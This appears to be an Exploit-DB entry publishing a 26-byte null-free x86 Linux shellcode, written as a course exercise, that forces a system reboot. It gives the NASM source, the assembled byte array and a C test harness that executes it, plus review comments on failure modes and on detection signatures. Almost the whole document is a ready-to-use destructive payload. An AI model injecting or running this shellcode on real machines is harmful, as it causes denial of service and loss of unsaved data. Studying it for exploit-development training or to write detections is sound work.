Linux/x86 - Reboot + Polymorphic Shellcode (26 bytes)

EDB-ID:

48243

CVE:

N/A


Author:

Upayan


Platform:

Linux_x86

Date:

2020-03-23


# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
# Purpose: This is an x86 Linux null-free polymorphic shellcode that forces a reboot.
# Date: 2020-03-23
# Author: Upayan a.k.a. slaeryan
# Contact: upayansaha@icloud.com
# SLAE: 1525
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# CVE: N/A


/*
; Filename: reboot_polymorphic.nasm
; Author: Upayan a.k.a. slaeryan
; SLAE: 1525
; Contact: upayansaha@icloud.com
; Purpose: This is an x86 Linux null-free polymorphic shellcode that forces a reboot.
; Testing: ./reboot_polymorphic
; Compile with: ./compile.sh reboot_polymorphic
; Size of shellcode: 26 bytes

; Export _start so the linker can use it as the entry point of the test binary.
global _start			

section .text
; _start: issue the Linux reboot system call through the 32-bit `int 0x80` gate.
; Syntax: NASM (Intel operand order), 32-bit x86.
; Register state at the `int 0x80` below:
;   EAX = 0x58                      (system call number, written through AL)
;   EBX = 0xfee1dead                (first magic value)
;   ECX = 672274793 = 0x28121969    (second magic value)
;   EDX = 0x1234567                 (LINUX_REBOOT_CMD_RESTART)
; NOTE(review): nothing follows the `int 0x80`. If the call returns instead of
; restarting the machine (reboot(2) fails with EPERM when the caller lacks
; CAP_SYS_BOOT), execution continues into whatever bytes come next in memory.
; NOTE(review): reboot(2) documents that a restart not preceded by sync(2)
; loses unwritten data; no sync is issued here.
; NOTE(review): for detection, the stable features are the syscall number and
; the three immediates; the register-clearing preamble does not affect the
; values the kernel sees, so a signature tied to it is brittle.
_start:
	xor eax, eax                ; EAX = 0, so the later write to AL leaves the upper 24 bits zero
    xor ebx, ebx                ; EBX = 0 (fully overwritten by the mov into EBX below)
    xor ecx, ecx                ; ECX = 0 (fully overwritten by the mov into ECX below)
    cdq                         ; Sign-extends EAX into EDX; EAX is 0 here, so EDX = 0 (overwritten below)
    mov al, 0x58                ; EAX = 0x58 (88): reboot on i386; the 8-bit form encodes without zero bytes
    mov ebx, 0xfee1dead         ; Argument 1: LINUX_REBOOT_MAGIC1
    mov ecx, 672274793          ; Argument 2: LINUX_REBOOT_MAGIC2 (decimal form of 0x28121969)
    mov edx, 0x1234567          ; Argument 3: cmd = LINUX_REBOOT_CMD_RESTART
    int 0x80                    ; Enter the kernel with EAX = call number, EBX/ECX/EDX = arguments

*/


#include <stdio.h>
#include <string.h>

/*
 * Assembled form of reboot_polymorphic.nasm, one string literal per
 * instruction. Adjacent literals are concatenated by the compiler, so the
 * array holds the 26 code bytes followed by the implicit terminating NUL.
 * None of the 26 code bytes is 0x00, which is why strlen() reports the
 * full length.
 */
unsigned char code[] =
	"\x31\xc0"                 /* xor eax, eax        */
	"\x31\xdb"                 /* xor ebx, ebx        */
	"\x31\xc9"                 /* xor ecx, ecx        */
	"\x99"                     /* cdq                 */
	"\xb0\x58"                 /* mov al, 0x58        */
	"\xbb\xad\xde\xe1\xfe"     /* mov ebx, 0xfee1dead */
	"\xb9\x69\x19\x12\x28"     /* mov ecx, 0x28121969 */
	"\xba\x67\x45\x23\x01"     /* mov edx, 0x01234567 */
	"\xcd\x80";                /* int 0x80            */

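/*
 * Test harness: prints the payload length, then transfers control to the
 * bytes in `code`.
 *
 * Behaviour to expect:
 *  - `code` is an ordinary initialised array, so it is placed in a data
 *    section. Where data pages are mapped non-executable the indirect call
 *    faults; that is the W^X protection working as designed.
 *  - Where the bytes are executable and the process holds CAP_SYS_BOOT, the
 *    machine restarts at once. The payload issues no sync(2), so unwritten
 *    file-system data is lost.
 *  - Without CAP_SYS_BOOT the system call fails and execution runs on past
 *    the end of the payload into the bytes that follow it.
 *
 * Returns 0 for a standard-conforming `main`; in practice that statement is
 * not reached, because the payload contains no return instruction.
 */
int main(void)
{
	/* strlen() returns size_t, so the matching conversion is %zu, and it
	 * expects a char pointer rather than unsigned char. The result is the
	 * payload length only because the payload has no 0x00 byte. */
	printf("Shellcode Length:  %zu\n", strlen((const char *)code));

	/* Reinterpret the array as a function and call it. */
	int (*ret)() = (int(*)())code;

	ret();

	return 0;
}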